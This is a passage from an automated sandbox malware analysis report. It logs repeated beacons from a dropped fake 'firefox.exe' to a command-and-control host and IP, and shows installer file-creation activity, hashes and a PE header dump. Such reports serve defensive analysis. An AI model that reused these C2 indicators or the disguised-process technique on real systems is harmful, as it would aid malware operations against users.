2018-05-07 12:50:18 UTC 507 OUT Data Raw: 50 0b 05 56 1e 53 4f 05 1a 55 48 04 4b 00 02 07 5d 56 02 48 5a 41 0e 06 10 59 41 0e 0b 4a 45 04 4f 01 56 Data Ascii: PVSOUHK]VHZAYAJEOV
2018-05-07 12:50:19 UTC 507 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:19 UTC 507 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
40 192.168.1.81 49205 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:13 UTC 517 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:13 UTC 517 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:13 UTC 517 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Copyright Joe Security LLC 2018 Page 78 of 149
2018-05-07 12:51:13 UTC 517 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
41 192.168.1.81 49206 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:15 UTC 517 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:15 UTC 517 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:15 UTC 517 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:15 UTC 518 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
42 192.168.1.81 49207 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:16 UTC 518 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:16 UTC 518 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:16 UTC 518 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:16 UTC 518 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
43 192.168.1.81 49208 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:17 UTC 518 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:17 UTC 518 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:17 UTC 518 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:17 UTC 518 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
44 192.168.1.81 49209 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:18 UTC 518 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Copyright Joe Security LLC 2018 Page 79 of 149
2018-05-07 12:51:18 UTC 518 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:19 UTC 518 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:19 UTC 518 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
45 192.168.1.81 49210 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:20 UTC 518 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:20 UTC 519 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:20 UTC 519 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:20 UTC 519 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
46 192.168.1.81 49211 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:21 UTC 519 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:21 UTC 519 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:21 UTC 519 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:21 UTC 519 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
47 192.168.1.81 49212 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:22 UTC 519 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:22 UTC 519 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:22 UTC 519 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:22 UTC 519 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
48 192.168.1.81 49213 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Copyright Joe Security LLC 2018 Page 80 of 149
TimestampkBytestransferred Direction Data
2018-05-07 12:51:23 UTC 519 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:23 UTC 519 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:24 UTC 519 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:24 UTC 520 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
49 192.168.1.81 49214 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:25 UTC 520 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:25 UTC 520 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:25 UTC 520 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:25 UTC 520 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
5 192.168.1.81 49169 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:20 UTC 507 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:20 UTC 507 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:20 UTC 507 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:20 UTC 507 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
50 192.168.1.81 49215 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:26 UTC 520 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:26 UTC 520 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:27 UTC 520 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:27 UTC 520 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Copyright Joe Security LLC 2018 Page 81 of 149
Session ID Source IP Source Port Destination IP Destination Port Process
51 192.168.1.81 49216 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:27 UTC 520 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:27 UTC 520 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:28 UTC 520 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:28 UTC 521 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
52 192.168.1.81 49217 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:28 UTC 521 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:28 UTC 521 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:29 UTC 521 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:29 UTC 521 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
53 192.168.1.81 49218 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:30 UTC 521 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:30 UTC 521 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:30 UTC 521 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:30 UTC 521 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
54 192.168.1.81 49219 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:31 UTC 521 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:31 UTC 521 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:32 UTC 521 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Copyright Joe Security LLC 2018 Page 82 of 149
2018-05-07 12:51:32 UTC 521 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
55 192.168.1.81 49220 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:32 UTC 521 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:32 UTC 522 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:33 UTC 522 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:33 UTC 522 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
56 192.168.1.81 49221 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:34 UTC 522 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:34 UTC 522 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:34 UTC 522 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:34 UTC 522 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
6 192.168.1.81 49170 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:22 UTC 507 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:22 UTC 507 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:22 UTC 507 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:22 UTC 507 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
7 192.168.1.81 49172 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:24 UTC 507 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Copyright Joe Security LLC 2018 Page 83 of 149
Code Manipulations
Statistics
Behavior
• facture_1398665.exe
• facture_1398665.tmp
• firefox.exe
• firefox.exe
• firefox.exe
• dllhost.exe
2018-05-07 12:50:24 UTC 507 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:25 UTC 507 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:25 UTC 508 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
8 192.168.1.81 49173 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:25 UTC 508 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:25 UTC 508 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:26 UTC 508 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:26 UTC 508 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
9 192.168.1.81 49174 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:26 UTC 508 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:26 UTC 508 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:27 UTC 508 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:27 UTC 508 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Copyright Joe Security LLC 2018 Page 84 of 149
• cmd.exe
• msiexec.exe
• msiexec.exe
• explorer.exe
Click to jump to process
System Behavior
File ActivitiesFile Activities
Start time: 14:49:19
Start date: 07/05/2018
Path: C:\Users\user\Desktop\facture_1398665.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\Desktop\facture_1398665.exe'
Imagebase: 0x400000
File size: 2153784 bytes
MD5 hash: FE1214A06FFC40B1EBB524F185894487
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp read data or list directory and synchronize
normal directory file and synchronous io non alert and open for backup ident and open reparse point
success or wait 1 40E461 CreateDirectoryW
C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp read attributes and synchronize and generic write
normal synchronous io non alert and non directory file
success or wait 1 40C322 CreateFileW
File Path Completion CountSourceAddress Symbol
C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp success or wait 1 40E1A4 DeleteFileW
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Analysis Process: facture_1398665.exe PID: 3792 Parent PID: 3020Analysis Process: facture_1398665.exe PID: 3792 Parent PID: 3020
General
File CreatedFile Created
File DeletedFile Deleted
File WrittenFile Written
Copyright Joe Security LLC 2018 Page 85 of 149
C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
unknown 1228800 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
success or wait 1 40C448 WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
C:\Users\user\Desktop\facture_1398665.exe unknown 64 success or wait 1 40C3AC ReadFile
C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 2 40C3AC ReadFile
C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 4 40C3AC ReadFile
C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 2 40C3AC ReadFile
File ActivitiesFile Activities
Start time: 14:49:20
Start date: 07/05/2018
Path: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
Wow64 process (32bit): false
Commandline: 'C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp' /SL5='$7016C,1728489,170496,C:\Users\user\Desktop\facture_1398665.exe'
Imagebase: 0x400000
File size: 1228800 bytes
MD5 hash: 9AE8DFC6C5CB2222DBD09F1176058373
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp read data or list directory and synchronize
normal directory file and synchronous io non alert and open for backup ident and open reparse point
success or wait 1 4AE2C1 CreateDirectoryW
File ReadFile Read
Analysis Process: facture_1398665.tmp PID: 3824 Parent PID: 3792Analysis Process: facture_1398665.tmp PID: 3824 Parent PID: 3792
General
File CreatedFile Created
Copyright Joe Security LLC 2018 Page 86 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\_isetup read data or list directory and synchronize
normal directory file and synchronous io non alert and open for backup ident and open reparse point
success or wait 1 4DE93C CreateDirectoryW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
File Path Access Attributes Options Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 87 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
File Path Access Attributes Options Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 88 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmp read attributes and synchronize and generic read and generic write
